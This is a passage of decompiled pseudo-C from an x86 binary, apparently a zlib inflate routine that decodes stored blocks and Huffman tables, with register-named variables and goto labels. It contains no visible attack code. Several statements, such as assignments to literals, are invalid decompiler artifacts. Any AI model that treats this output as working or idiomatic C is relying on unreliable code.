									case 7:
										L100:
										if(( *(__edi + 0x10) & 0x00001000) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x24) = 0;
											}
											goto L115;
										} else {
											if(__edx == 0) {
												goto L312;
											} else {
												__eax = 0;
												while(1) {
													__ecx = __ebp[__eax] & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax =  *(__edi + 0x20);
													 *(__esp + 0x20) = __ecx;
													if(__eax != 0) {
														__ecx =  *(__eax + 0x24);
														 *(__esp + 0x34) = __ecx;
														if(__ecx != 0) {
															__ecx =  *(__edi + 0x40);
															if(__ecx <  *((intOrPtr*)(__eax + 0x28))) {
																__edx =  *(__esp + 0x34);
																__al =  *(__esp + 0x20);
																 *( *(__esp + 0x34) + __ecx) = __al;
																 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																__edx =  *(__esp + 0x10);
															}
														}
													}
													if( *(__esp + 0x20) == 0) {
														break;
													}
													__eax =  *(__esp + 0x14);
													if(__eax < __edx) {
														continue;
													}
													break;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x14);
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__esp + 0x10) = __edx;
												if( *(__esp + 0x20) != 0) {
													goto L312;
												} else {
													L115:
													 *__edi = 8;
													goto L116;
												}
											}
										}
										goto L331;
									case 8:
										L116:
										if(( *(__edi + 0x10) & 0x00000200) == 0) {
											L123:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__edi + 0x10) =  *(__edi + 0x10) >> 9;
												__ecx =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												 *(__eax + 0x2c) =  *(__edi + 0x10) >> 0x00000009 & 0x00000001;
												__edx =  *(__edi + 0x20);
												 *( *(__edi + 0x20) + 0x30) = 1;
											}
											__eax = E00403080(0, 0, 0);
											__ecx =  *(__esp + 0x4c);
											__edx =  *(__esp + 0x1c);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x4c) + 0x30) = __eax;
											 *__edi = 0xb;
											goto L304;
										} else {
											if(__esi >= 0x10) {
												L120:
												__ecx =  *(__edi + 0x18) & 0x0000ffff;
												if(__ebx == ( *(__edi + 0x18) & 0x0000ffff)) {
													__ebx = 0;
													__esi = 0;
													goto L123;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
												goto L304;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L120;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 9:
										if(__esi >= 0x20) {
											L130:
											__ebx = __ebx & 0x0000ff00;
											__ebx = __ebx << 0x10;
											__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10);
											__ebx = __ebx >> 8;
											__ecx = (__ebx & 0x0000ff00) + (__ebx << 0x10) << 8;
											__eax = __ebx >> 0x00000008 & 0x0000ff00;
											__ecx = ((__ebx & 0x0000ff00) + (__ebx << 0x10) << 8) + (__ebx >> 0x00000008 & 0x0000ff00);
											__eax = __ecx + __ebx;
											__ecx =  *(__esp + 0x40);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x40) + 0x30) = __eax;
											__ebx = 0;
											__esi = 0;
											 *__edi = 0xa;
											goto L131;
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L130;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0xa:
										L131:
										if( *((intOrPtr*)(__edi + 0xc)) == 0) {
											__eax =  *(__esp + 0x40);
											__ecx =  *(__esp + 0x24);
											 *(__eax + 0xc) =  *(__esp + 0x24);
											__ecx =  *(__esp + 0x18);
											 *__eax = __ebp;
											 *(__eax + 0x10) =  *(__esp + 0x18);
											 *(__eax + 4) = __edx;
											 *(__edi + 0x3c) = __esi;
											_pop(__esi);
											_pop(__ebp);
											 *(__edi + 0x38) = __ebx;
											_pop(__ebx);
											__eax = 2;
											return 2;
										} else {
											_push(0);
											_push(0);
											_push(0);
											__eax = E004024A0();
											__edx =  *(__esp + 0x4c);
											 *(__edi + 0x18) = __eax;
											 *( *(__esp + 0x4c) + 0x30) = __eax;
											__edx =  *(__esp + 0x1c);
											__esp = __esp + 0xc;
											 *__edi = 0xb;
											goto L133;
										}
										goto L331;
									case 0xb:
										L133:
										if( *((intOrPtr*)(__esp + 0x44)) == 5) {
											goto L312;
										} else {
											goto L134;
										}
										goto L331;
									case 0xc:
										L134:
										if( *(__edi + 4) == 0) {
											if(__esi >= 3) {
												L140:
												__ecx = __ebx;
												__ebx = __ebx >> 1;
												__eax = __ebx;
												__ecx = __ecx & 0x00000001;
												__eax = __ebx & 0x00000003;
												__esi = __esi - 1;
												 *(__edi + 4) = __ecx;
												if(__eax > 3) {
													L146:
													__ebx = __ebx >> 2;
													__esi = __esi - 2;
												} else {
													switch( *((intOrPtr*)(__eax * 4 +  &M00408838))) {
														case 0:
															__ebx = __ebx >> 2;
															 *__edi = 0xd;
															__esi = __esi - 2;
															goto L304;
														case 1:
															__eax = __edi;
															__eax = E00407290(__edi);
															__ebx = __ebx >> 2;
															 *__edi = 0x12;
															__esi = __esi - 2;
															goto L304;
														case 2:
															__ebx = __ebx >> 2;
															 *__edi = 0xf;
															__esi = __esi - 2;
															goto L304;
														case 3:
															__eax =  *(__esp + 0x40);
															 *(__eax + 0x18) = 0x41d338;
															 *__edi = 0x1b;
															goto L146;
													}
												}
												goto L304;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 3) {
														continue;
													} else {
														goto L140;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											__esi = __esi & 0x00000007;
											__ebx = __ebx >> __cl;
											__esi = __esi - (__esi & 0x00000007);
											 *__edi = 0x18;
											goto L304;
										}
										goto L331;
									case 0xd:
										__esi = __esi & 0x00000007;
										__esi = __esi - (__esi & 0x00000007);
										__ebx = __ebx >> __cl;
										if(__esi >= 0x20) {
											L150:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx =  !__ebx;
											__eax = __ebx & 0x0000ffff;
											__ecx =  !__ebx >> 0x10;
											if(__eax ==  !__ebx >> 0x10) {
												__ebx = 0;
												 *(__edi + 0x40) = __eax;
												__esi = 0;
												 *__edi = 0xe;
												goto L153;
											} else {
												__eax =  *(__esp + 0x40);
												 *(__eax + 0x18) = 0x41d338;
												goto L303;
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L150;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0xe:
										L153:
										__eax =  *(__edi + 0x40);
										 *(__esp + 0x14) = __eax;
										if(__eax == 0) {
											goto L233;
										} else {
											if(__eax > __edx) {
												__eax = __edx;
												 *(__esp + 0x14) = __edx;
											}
											__ecx =  *(__esp + 0x18);
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x14) = __eax;
											}
											if(__eax == 0) {
												goto L312;
											} else {
												__ecx =  *(__esp + 0x14);
												__edx =  *(__esp + 0x24);
												__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x24), __ebp,  *(__esp + 0x14));
												__eax =  *(__esp + 0x20);
												 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
												 *(__esp + 0x24) =  *(__esp + 0x24) - __eax;
												 *(__esp + 0x30) =  *(__esp + 0x30) + __eax;
												__edx =  *(__esp + 0x1c);
												__ebp =  &(__ebp[__eax]);
												 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
												goto L304;
											}
										}
										goto L331;
									case 0xf:
										if(__esi >= 0xe) {
											L163:
											__ecx = __ebx;
											__ecx = __ebx & 0x0000001f;
											__ebx = __ebx >> 5;
											__ecx = __ecx + 0x101;
											__eax = __ebx;
											 *(__edi + 0x60) = __ecx;
											__ebx = __ebx >> 5;
											__ecx = __ebx;
											__eax = __eax & 0x0000001f;
											__ecx = __ebx & 0x0000000f;
											__eax = __eax + 1;
											__ecx = (__ebx & 0x0000000f) + 4;
											__ebx = __ebx >> 4;
											__esi = __esi - 0xe;
											 *(__edi + 0x64) = __eax;
											 *(__edi + 0x5c) = __ecx;
											if( *(__edi + 0x60) > 0x11e || __eax > 0x1e) {
												goto L34;
											} else {
												 *(__edi + 0x68) = 0;
												 *__edi = 0x10;
												goto L166;
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0xe) {
													continue;
												} else {
													goto L163;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0x10:
										L166:
										__ecx =  *(__edi + 0x68);
										if( *(__edi + 0x68) >=  *(__edi + 0x5c)) {
											L172:
											__eax = 0x13;
											while( *(__edi + 0x68) < 0x13) {
												__edx =  *(__edi + 0x68);
												__ecx =  *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												__edx = 0;
												 *((short*)(__edi + 0x70 + ( *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff) * 2)) = __dx;
												 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
											}
											__eax = __edi + 0x530;
											__ecx = __edi + 0x6c;
											 *(__edi + 0x6c) = __eax;
											 *(__edi + 0x4c) = __eax;
											__edx = __edi + 0x2f0;
											__eax = __edi + 0x54;
											 *(__edi + 0x54) = 7;
											__eax = __edi + 0x70;
											__eax = E00408C60(0, __edi + 0x70, 0x13, __edi + 0x6c, __edi + 0x70, __edi + 0x2f0);
											__edx =  *(__esp + 0x28);
											 *(__esp + 0x30) = __eax;
											if(__eax != 0) {
												goto L302;
											} else {
												 *(__edi + 0x68) = __eax;
												 *__edi = 0x11;
												goto L177;
											}
										} else {
											do {
												if(__esi >= 3) {
													goto L171;
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebp =  &(__ebp[1]);
														__ebx = __ebx + __eax;
														 *(__esp + 0x10) = __edx;
														if(__esi < 3) {
															continue;
														} else {
															goto L171;
														}
														goto L331;
													}
													goto L312;
												}
												goto L331;
												L171:
												__eax =  *(__edi + 0x68);
												__eax =  *(0x41e468 +  *(__edi + 0x68) * 2) & 0x0000ffff;
												__ebx = __ebx & 0x00000007;
												 *((short*)(__edi + 0x70 + __eax * 2)) = __cx;
												 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
												__ecx =  *(__edi + 0x68);
												__ebx = __ebx >> 3;
												__esi = __esi - 3;
											} while ( *(__edi + 0x68) <  *(__edi + 0x5c));
											goto L172;
										}
										goto L331;
									case 0x11:
										L177:
										__eax =  *(__edi + 0x64);
										__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
										if( *(__edi + 0x68) >= __eax) {
											L210:
											if( *__edi == 0x1b) {
												goto L304;
											} else {
												__eax = __edi + 0x530;
												__ecx = __edi + 0x6c;
												 *(__edi + 0x6c) = __eax;
												__edx = __edi + 0x2f0;
												 *(__edi + 0x4c) = __eax;
												__eax = __edi + 0x54;
												__ecx =  *(__edi + 0x60);
												__edx = __edi + 0x70;
												 *(__edi + 0x54) = 9;
												__eax = E00408C60(1, __edi + 0x70,  *(__edi + 0x60),  *(__edi + 0x60), __edi + 0x54, __edi + 0x2f0);
												 *(__esp + 0x30) = __eax;
												if(__eax == 0) {
													__edx =  *(__edi + 0x6c);
													__ecx = __edi + 0x6c;
													 *(__edi + 0x50) =  *(__edi + 0x6c);
													__edx = __edi + 0x2f0;
													__eax = __edi + 0x58;
													__ecx =  *(__edi + 0x60);
													 *(__edi + 0x58) = 6;
													__eax =  *(__edi + 0x64);
													__edx = __edi + 0x70 +  *(__edi + 0x60) * 2;
													__eax = E00408C60(2, __edi + 0x70 +  *(__edi + 0x60) * 2,  *(__edi + 0x64), __edi + 0x6c,  *(__edi + 0x64), __edi + 0x2f0);
													__edx =  *(__esp + 0x28);
													 *(__esp + 0x30) = __eax;
													if(__eax == 0) {
														 *__edi = 0x12;
														goto L216;
													} else {
														__eax =  *(__esp + 0x40);
														 *(__eax + 0x18) = 0x41d338;
														goto L303;
													}
												} else {
													__eax =  *(__esp + 0x40);
													__edx =  *(__esp + 0x10);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											}
										} else {
											do {
												__ecx =  *(__edi + 0x54);
												1 = 1 << __cl;
												__ecx =  *(__edi + 0x4c);
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
												1 = 1 >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x14) = 1;
												if((__cl & 0x000000ff) <= __esi) {
													L181:
													__eax = __eax >> 0x10;
													if(__eax >> 0x10 >= 0x10) {
														__cx =  *((intOrPtr*)(__esp + 0x16));
														if(__cx != 0x10) {
															__ecx = __ah & 0x000000ff;
															 *(__esp + 0x2c) = __ecx;
															if(__cx != 0x11) {
																__eax = __ecx + 7;
																if(__esi >= __eax) {
																	L203:
																	__ebx = __ebx >> __cl;
																	__ebx = __ebx & 0x0000007f;
																	__eax = (__ebx & 0x0000007f) + 0xb;
																	 *(__esp + 0x14) = (__ebx & 0x0000007f) + 0xb;
																	__ebx = __ebx >> 7;
																	__eax = 0xfffffff9;
																	goto L204;
																} else {
																	while(__edx != 0) {
																		__eax =  *__ebp & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebp & 0x000000ff) << __cl;
																		__ecx =  *(__esp + 0x2c);
																		__edx = __edx - 1;
																		__esi = __esi + 8;
																		__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																		__eax = __ecx + 7;
																		__ebp =  &(__ebp[1]);
																		 *(__esp + 0x10) = __edx;
																		if(__esi < __eax) {
																			continue;
																		} else {
																			goto L203;
																		}
																		goto L331;
																	}
																	goto L312;
																}
															} else {
																__eax = __ecx + 3;
																if(__esi >= __eax) {
																	L199:
																	__ebx = __ebx >> __cl;
																	__ebx = __ebx & 0x00000007;
																	__eax = (__ebx & 0x00000007) + 3;
																	 *(__esp + 0x14) = (__ebx & 0x00000007) + 3;
																	__ebx = __ebx >> 3;
																	__eax = 0xfffffffd;
																	L204:
																	__esi = __esi + __eax;
																	__eax =  *(__esp + 0x14);
																	 *(__esp + 0x20) = 0;
																	goto L205;
																} else {
																	while(__edx != 0) {
																		__eax =  *__ebp & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebp & 0x000000ff) << __cl;
																		__ecx =  *(__esp + 0x2c);
																		__edx = __edx - 1;
																		__esi = __esi + 8;
																		__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																		__eax = __ecx + 3;
																		__ebp =  &(__ebp[1]);
																		 *(__esp + 0x10) = __edx;
																		if(__esi < __eax) {
																			continue;
																		} else {
																			goto L199;
																		}
																		goto L331;
																	}
																	goto L312;
																}
															}
														} else {
															__ecx = __ah & 0x000000ff;
															__eax = __ecx + 2;
															 *(__esp + 0x2c) = __ecx;
															if(__esi >= __eax) {
																L192:
																__eax =  *(__edi + 0x68);
																__ebx = __ebx >> __cl;
																__esi = __esi - __ecx;
																if(__eax == 0) {
																	goto L302;
																} else {
																	__ecx =  *(__edi + 0x6e + __eax * 2) & 0x0000ffff;
																	__ebx = __ebx & 0x00000003;
																	__eax = (__ebx & 0x00000003) + 3;
																	__ebx = __ebx >> 2;
																	 *(__esp + 0x20) = __ecx;
																	 *(__esp + 0x14) = __eax;
																	__esi = __esi - 2;
																	L205:
																	__ecx =  *(__edi + 0x68);
																	__ecx =  *(__edi + 0x68) + __eax;
																	 *(__edi + 0x64) =  *(__edi + 0x64) +  *(__edi + 0x60);
																	if(__ecx >  *(__edi + 0x64) +  *(__edi + 0x60)) {
																		L34:
																		__eax =  *(__esp + 0x40);
																		 *(__eax + 0x18) = 0x41d338;
																		goto L303;
																	} else {
																		if( *(__esp + 0x14) != 0) {
																			__eax =  *(__esp + 0x20);
																			do {
																				__ecx =  *(__edi + 0x68);
																				 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
																				 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __ax;
																				 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
																			} while ( *(__esp + 0x14) != 0);
																		}
																		goto L209;
																	}
																}
															} else {
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__ecx =  *(__esp + 0x2c);
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																	__eax = __ecx + 2;
																	__ebp =  &(__ebp[1]);
																	 *(__esp + 0x10) = __edx;
																	if(__esi < __eax) {
																		continue;
																	} else {
																		goto L192;
																	}
																	goto L331;
																}
																goto L312;
															}
														}
													} else {
														__eax = __eax >> 8;
														__ecx = __cl & 0x000000ff;
														if(__esi >= (__cl & 0x000000ff)) {
															L186:
															__ecx = __ah & 0x000000ff;
															__eax =  *(__edi + 0x68);
															__ebx = __ebx >> __cl;
															__esi = __esi - (__ah & 0x000000ff);
															__cx =  *((intOrPtr*)(__esp + 0x16));
															 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __cx;
															 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
															goto L209;
														} else {
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																__eax =  *(__esp + 0x14);
																__ecx = __ah & 0x000000ff;
																 *(__esp + 0x10) = __edx;
																if(__esi < (__ah & 0x000000ff)) {
																	continue;
																} else {
																	goto L186;
																}
																goto L331;
															}
															goto L312;
														}
													}
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__ecx =  *(__edi + 0x54);
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
														1 = 1 << __cl;
														__ecx =  *(__edi + 0x4c);
														__ebp =  &(__ebp[1]);
														 *(__esp + 0x10) = __edx;
														(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
														__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
														1 = 1 >> 8;
														__ecx = __cl & 0x000000ff;
														 *(__esp + 0x14) = 1;
														if((__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L181;
														}
														goto L331;
													}
													goto L312;
												}
												goto L331;
												L209:
												__eax =  *(__edi + 0x64);
												__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
											} while ( *(__edi + 0x68) < __eax);
											goto L210;
										}
										goto L331;
									case 0x12:
										L216:
										if(__edx < 6 ||  *(__esp + 0x18) < 0x102) {
											__ecx =  *(__edi + 0x54);
											1 = 1 << __cl;
											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
											__ecx = (0x00000001 << __cl) - 0x00000001 & __ebx;
											__eax =  *(__edi + 0x4c);
											__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											 *(__esp + 0x14) = __eax;
											if((__cl & 0x000000ff) <= __esi) {
												L223:
												if(__al == 0 || (__al & 0x000000f0) != 0) {
													L230:
													__eax = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													__ebx = __ebx >> __cl;
													__esi = __esi - __ecx;
													 *(__esp + 0x20) = __ecx;
													__eax = __eax >> 0x10;
													 *(__edi + 0x40) = __eax >> 0x10;
													if(__al != 0) {
														if((__al & 0x00000020) == 0) {
															if((__al & 0x00000040) == 0) {
																__al & 0x000000ff = __al & 0xf;
																 *(__edi + 0x48) = __al & 0xf;
																 *__edi = 0x13;
																goto L237;
															} else {
																__eax =  *(__esp + 0x40);
																 *(__eax + 0x18) = 0x41d338;
																goto L303;
															}
														} else {
															L233:
															 *__edi = 0xb;
															goto L304;
														}
													} else {
														 *__edi = 0x17;
														goto L304;
													}
												} else {
													__eax = __eax >> 8;
													 *(__esp + 0x34) = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__esp + 0x20) = __cl & 0x000000ff;
													__al & 0x000000ff = (__al & 0x000000ff) +  *(__esp + 0x20);
													 *(__esp + 0x2c) = __eax;
													1 = 1 << __cl;
													__ecx =  *(__esp + 0x20);
													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
													__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
													 *(__esp + 0x14) =  *(__esp + 0x14) >> 0x10;
													__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
													__ecx = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
													__eax =  *(__edi + 0x4c);
													__eax =  *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10)) * 4);
													__ecx =  *(__esp + 0x34) & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax = __al & 0x000000ff;
													__eax = (__al & 0x000000ff) + ( *(__esp + 0x34) & 0x000000ff);
													if(__eax <= __esi) {
														L229:
														__ecx =  *(__esp + 0x2d) & 0x000000ff;
														__eax =  *(__esp + 0x14);
														__ebx = __ebx >> __cl;
														__esi = __esi - ( *(__esp + 0x2d) & 0x000000ff);
														goto L230;
													} else {
														while(__edx != 0) {
															__eax =  *__ebp & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebp & 0x000000ff) << __cl;
															__ecx =  *(__esp + 0x2c);
															__edx = __edx - 1;
															__esi = __esi + 8;
															__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
															__eax = __ch & 0x000000ff;
															 *(__esp + 0x20) = __eax;
															__cl & 0x000000ff = (__cl & 0x000000ff) + __eax;
															1 = 1 << __cl;
															__ecx =  *(__esp + 0x20);
															__ebp =  &(__ebp[1]);
															 *(__esp + 0x10) = __edx;
															(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
															__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
															__ecx =  *(__esp + 0x2e) & 0x0000ffff;
															__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff);
															__ecx =  *(__edi + 0x4c);
															__eax =  *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4);
															 *(__esp + 0x14) = 1;
															 *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4) >> 8 = __al & 0x000000ff;
															__eax = (__al & 0x000000ff) +  *(__esp + 0x20);
															if(__eax > __esi) {
																continue;
															} else {
																goto L229;
															}
															goto L331;
														}
														goto L312;
													}
												}
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__ecx =  *(__edi + 0x54);
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
													1 = 1 << __cl;
													__ecx =  *(__edi + 0x4c);
													__ebp =  &(__ebp[1]);
													 *(__esp + 0x10) = __edx;
													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
													__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
													1 = 1 >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__esp + 0x14) = 1;
													if((__cl & 0x000000ff) > __esi) {
														continue;
													} else {
														goto L223;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											__eax =  *(__esp + 0x40);
											__edx =  *(__esp + 0x18);
											__ecx =  *(__esp + 0x24);
											 *(__eax + 0x10) =  *(__esp + 0x18);
											__edx =  *(__esp + 0x28);
											 *(__eax + 0xc) =  *(__esp + 0x24);
											__ecx =  *(__esp + 0x10);
											_push( *(__esp + 0x28));
											 *__eax = __ebp;
											 *(__eax + 4) = __ecx;
											_push(__eax);
											 *(__edi + 0x38) = __ebx;
											 *(__edi + 0x3c) = __esi;
											__eax = E00406CA0();
											__eax =  *(__esp + 0x48);
											__edx =  *(__eax + 0x10);
											__ecx =  *(__eax + 0xc);
											__ebp =  *__eax;
											__eax =  *(__eax + 4);
											__ebx =  *(__edi + 0x38);
											__esi =  *(__edi + 0x3c);
											 *(__esp + 0x20) = __edx;
											__esp = __esp + 8;
											 *(__esp + 0x24) = __ecx;
											 *(__esp + 0x10) = __eax;
											__edx = __eax;
											goto L304;
										}
										goto L331;
									case 0x13:
										L237:
										__eax =  *(__edi + 0x48);
										if(__eax == 0) {
											L243:
											 *__edi = 0x14;
											goto L244;
										} else {
											if(__esi >= __eax) {
												L242:
												__ecx =  *(__edi + 0x48);
												1 = 1 << __cl;
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												 *(__edi + 0x40) =  *(__edi + 0x40) + ((0x00000001 << __cl) - 0x00000001 & __ebx);
												__ebx = __ebx >> __cl;
												__esi = __esi -  *(__edi + 0x48);
												goto L243;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi <  *(__edi + 0x48)) {
														continue;
													} else {
														goto L242;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x14:
										L244:
										__ecx =  *(__edi + 0x58);
										1 = 1 << __cl;
										(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
										__ecx = (0x00000001 << __cl) - 0x00000001 & __ebx;
										__eax =  *(__edi + 0x50);
										__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
										__eax = __eax >> 8;
										__ecx = __cl & 0x000000ff;
										 *(__esp + 0x14) = __eax;
										if((__cl & 0x000000ff) <= __esi) {
											L248:
											if((__al & 0x000000f0) != 0) {
												L253:
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												__ebx = __ebx >> __cl;
												__esi = __esi - __ecx;
												 *(__esp + 0x20) = __ecx;
												if((__al & 0x00000040) == 0) {
													__ecx = __eax;
													__eax = __al & 0x000000ff;
													__ecx = __ecx >> 0x10;
													__eax = __al & 0xf;
													 *(__edi + 0x44) = __ecx;
													 *(__edi + 0x48) = __al & 0xf;
													 *__edi = 0x15;
													goto L256;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											} else {
												__eax = __eax >> 8;
												 *(__esp + 0x34) = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x20) = __cl & 0x000000ff;
												__al & 0x000000ff = (__al & 0x000000ff) +  *(__esp + 0x20);
												 *(__esp + 0x2c) = __eax;
												1 = 1 << __cl;
												__ecx =  *(__esp + 0x20);
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
												 *(__esp + 0x14) =  *(__esp + 0x14) >> 0x10;
												__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
												__ecx = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
												__eax =  *(__edi + 0x50);
